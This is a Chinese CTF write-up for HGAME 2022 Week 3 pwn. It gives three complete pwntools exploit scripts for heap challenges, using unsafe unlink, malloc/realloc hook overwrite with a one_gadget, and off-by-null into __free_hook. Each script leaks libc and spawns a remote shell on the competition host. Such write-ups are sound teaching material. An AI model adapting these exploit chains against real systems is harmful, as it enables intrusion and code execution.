HGAME 2022 Week3 Pwn
三个最简单的堆模板题,真是一周比一周简单了......
changeable_note
unsafe unlink
模板题,当然用其他方法也能做。(感谢狒猩橙写的exp)
from pwn import *
from hashlib import *
# Target setup: 64-bit, verbose I/O tracing, remote endpoint as given in the writeup.
context(arch='amd64', log_level='debug')
# s = process('./note')   # local alternative kept from the original script
s = remote('chuj.top', 52533)
# Binaries the script resolves symbols from (libc version bundled with the challenge).
libc = ELF('./libc-2.23.so')
elf = ELF('./note')
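def getYZM(s64):
    """Solve the service's 4-character SHA-256 proof-of-work gate.

    Args:
        s64: the 64-character hex digest received from the service (bytes).

    Returns:
        The 4-byte alphanumeric string (over ``table``) whose SHA-256 hex
        digest equals ``s64``.

    Raises:
        ValueError: if ``s64`` is not 64 characters long, or if no
            4-character candidate matches.
    """
    import itertools

    # Explicit check instead of ``assert`` so it survives ``python -O``.
    if len(s64) != 64:
        raise ValueError(f"expected a 64-char hex digest, got {len(s64)} chars")
    table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    target = s64.decode()
    # product() walks candidates in the same lexicographic order as the
    # original four nested loops, so the first match is unchanged.
    for chars in itertools.product(table, repeat=4):
        candidate = "".join(chars).encode()
        if sha256(candidate).hexdigest() == target:
            return candidate
    raise ValueError("no 4-character preimage found for the given digest")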
def add(index, size, content):
    """Menu option 1: select index and size, then send ``content`` (no newline)."""
    for field in (b'1', str(index), str(size)):
        s.sendlineafter(b'>> ', field)
    # the note body is sent raw, without a trailing newline
    s.sendafter(b'>> ', content)
def edit(index, content):
    """Menu option 2 (edit): select ``index``, then send ``content`` followed by a newline."""
    for field in (b'2', str(index)):
        s.sendlineafter(b'>> ', field)
    s.sendline(content)
def delete(index):
    """Menu option 3 (delete): select ``index``."""
    for field in (b'3', str(index)):
        s.sendlineafter(b'>> ', field)
# Fixed address and symbol lookups used by the payloads (values as given in the writeup).
note_addr = 0x4040C0
fd, bk = note_addr - 0x18, note_addr - 0x10
puts_plt, puts_got = elf.plt['puts'], elf.got['puts']
free_got, atoi_got = elf.got['free'], elf.got['atoi']
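# Proof-of-work gate: everything up to ') == ' is prompt text (discarded);
# the remainder of that line is the 64-hex-char target digest.
s.recvuntil(b") == ")
s64 = s.recvline(keepends=False)
s.sendline(getYZM(s64))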
# Exploitation sequence for the writeup's "unsafe unlink" approach. The calls
# are strictly order-dependent and are kept byte-for-byte as written.
add(0 , 0x30 , b'a')
add(1 , 0xf0 , b'a')
add(2 , 0x30 , b'/bin/sh\x00')
add(3 , 0x30 , b'a')
# payload layout taken verbatim from the writeup (uses fd/bk defined above)
payload = p64(0) + p64(0x31) + p64(fd) + p64(bk) + b'a'*0x10 + p64(0x30) + p64(0x100)
edit(0 , payload)
delete(1)
edit(0 , b'a'*0x18 + p64(atoi_got) + p64(free_got) + p64(atoi_got))
edit(1 , p32(puts_plt) + b'\x00')
delete(0)
# leak: read 6 raw bytes, zero-extend to 8, subtract atoi's libc offset -> libc base
libc_base = u64(s.recv(6).ljust(8,b'\x00')) - libc.sym['atoi']
success('libc_base=>' + hex(libc_base))
system_addr = libc_base + libc.sym['system']
edit(2 ,p64(system_addr))
s.sendline(b"/bin/sh\x00")
s.interactive()
elder_note
__realloc_hook
配合__malloc_hook
调整栈帧,打one_gadget。(感谢狒猩橙写的exp)
from pwn import *
from hashlib import *
# Target setup: 64-bit, verbose I/O tracing, remote endpoint as given in the writeup.
context(arch='amd64', log_level='debug')
s = remote('chuj.top', 52703)
# Binaries the script resolves symbols from (libc version bundled with the challenge).
libc = ELF('./libc-2.23.so')
elf = ELF('./note')
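def getYZM(s64):
    """Solve the service's 4-character SHA-256 proof-of-work gate.

    Args:
        s64: the 64-character hex digest received from the service (bytes).

    Returns:
        The 4-byte alphanumeric string (over ``table``) whose SHA-256 hex
        digest equals ``s64``.

    Raises:
        ValueError: if ``s64`` is not 64 characters long, or if no
            4-character candidate matches.
    """
    import itertools

    # Explicit check instead of ``assert`` so it survives ``python -O``.
    if len(s64) != 64:
        raise ValueError(f"expected a 64-char hex digest, got {len(s64)} chars")
    table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    target = s64.decode()
    # product() walks candidates in the same lexicographic order as the
    # original four nested loops, so the first match is unchanged.
    for chars in itertools.product(table, repeat=4):
        candidate = "".join(chars).encode()
        if sha256(candidate).hexdigest() == target:
            return candidate
    raise ValueError("no 4-character preimage found for the given digest")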
def add(index, size, content):
    """Menu option 1: select index and size, then send ``content`` (no newline)."""
    for field in (b'1', str(index), str(size)):
        s.sendlineafter(b'>> ', field)
    # the note body is sent raw, without a trailing newline
    s.sendafter(b'>> ', content)
def show(index):
    """Menu option 2 (show): select ``index``."""
    for field in (b'2', str(index)):
        s.sendlineafter(b'>> ', field)
def delete(index):
    """Menu option 3 (delete): select ``index``."""
    for field in (b'3', str(index)):
        s.sendlineafter(b'>> ', field)
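# Proof-of-work gate: everything up to ') == ' is prompt text (discarded);
# the remainder of that line is the 64-hex-char target digest.
s.recvuntil(b") == ")
s64 = s.recvline(keepends=False)
s.sendline(getYZM(s64))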
# Exploitation sequence (writeup: __realloc_hook together with __malloc_hook,
# then a one_gadget). Strictly order-dependent; kept byte-for-byte as written.
add(0 , 0x60 , b'a')
add(1 , 0x60 , b'a')
add(2 , 0x80 , b'a')
add(3 , 0x60 , b'a')
delete(2)
show(2)
# leak: take the last 6 bytes up to the 0x7f marker, zero-extend to 8; 0x10 and 88
# are fixed adjustments from the writeup applied before subtracting __malloc_hook's offset
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x10 - 88 - libc.sym['__malloc_hook']
__malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['realloc']
# one_gadget offsets for the bundled libc-2.23 (values as given in the writeup; index 1 is used)
onegadget = [0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget = libc_base + onegadget[1]
success('libc_base=>' + hex(libc_base))
delete(0)
delete(1)
delete(0)
add(0 , 0x60 , p64(__malloc_hook-0x23))
add(1 , 0x60 , b'a')
add(4 , 0x60 , b'a')
add(5 , 0x60 , b'a'*0xb + p64(one_gadget) + p64(realloc))
# final allocation issued by hand (option 1, index 8, size 32) rather than via add(),
# so no content is sent afterwards
s.sendlineafter(b'>> ' , b'1')
s.sendlineafter(b'>> ' , str(8))
s.sendlineafter(b'>> ' , str(32))
s.interactive()
sized_note
off by null
模板水题,随便写写就行了。
from pwn import *
import string
from hashlib import sha256
# Target setup: 64-bit Linux, verbose I/O tracing; remote endpoint as given in the writeup.
context.update(arch='amd64', os='linux', log_level='debug')
#io = process("./note")
io = remote("chuj.top", 52838)
# libc the script resolves symbols from (the 2.27 line is the original's commented alternative)
#libc = ELF("./libc-2.27.so")
libc = ELF("./libc.so.6")
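# Alphabet for the proof-of-work search (digits first, then letters — order
# determines which candidate is found first, so it is kept as in the original).
table = string.digits + string.ascii_letters


def _find_prefix(target):
    """Return the 4-character string over ``table`` whose SHA-256 hex digest is ``target``.

    Candidates are tried in the same nested lexicographic order as the
    original loops. Returns ``""`` when nothing matches (the original's
    fallback value for ``prefix``).
    """
    for a in table:
        for b in table:
            for c in table:
                for d in table:
                    candidate = a + b + c + d
                    if sha256(candidate.encode()).hexdigest() == target:
                        return candidate
    return ""


# Proof-of-work gate: the digest follows " == "; the first 64 bytes are the hex target.
io.recvuntil(" == ")
tar = io.recv(64).decode()
success("tar:\t" + tar)
# Early return from the helper replaces the original flag-and-break pyramid.
prefix = _find_prefix(tar)
success("prefix:\t" + prefix)
io.sendlineafter("> ", prefix.encode())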
def add(index, size, content):
    """Menu option 1: select index and size, then send ``content`` (no newline)."""
    for field in (b'1', str(index), str(size)):
        io.sendlineafter(">> ", field)
    # the note body is sent raw, without a trailing newline
    io.sendafter(">> ", content)
def show(index):
    """Menu option 2 (show): select ``index``."""
    for field in (b'2', str(index)):
        io.sendlineafter(">> ", field)
def delete(index):
    """Menu option 3 (delete): select ``index``."""
    for field in (b'3', str(index)):
        io.sendlineafter(">> ", field)
def edit(index, content):
    """Menu option 4 (edit): select ``index``, then send ``content`` raw (no newline)."""
    for field in (b'4', str(index)):
        io.sendlineafter(">> ", field)
    io.send(content)
def quit():
    """Menu option 5 (quit). NOTE: this name shadows Python's builtin ``quit``."""
    choice = b'5'
    io.sendlineafter(">> ", choice)
if __name__ == '__main__':
    # Exploitation sequence for the writeup's "off by null" approach. The
    # call order is significant and is kept byte-for-byte as written.
    for i in range(8):
        add(i, 0xf0, b'\n')
    add(8, 0x50, b'\n')
    add(9, 0x50, b'\n')
    add(10, 0x28, b'\n')
    add(11, 0xf0, b'\n')
    add(12, 0x20, b'\n')
    for i in range(7):
        delete(i)
    edit(10, b'a'*0x20 + p64(0x1f0))
    delete(7)
    delete(11)
    add(11, 0x100, b'\n')
    add(12, 0x40, b'\n')
    show(9)
    # leak: 6 raw bytes zero-extended to 8; 96 and 0x10 are the writeup's fixed
    # adjustments applied before subtracting __malloc_hook's offset
    libc.address = u64(io.recv(6).ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
    success("libc_base:\t" + hex(libc.address))
    add(13, 0x50, b'\n')
    delete(9)
    edit(13, p64(libc.sym['__free_hook'] - 8))
    add(14, 0x50, b'\n')
    add(15, 0x50, b'/bin/sh\x00' + p64(libc.sym['system']))
    delete(15)
    io.interactive()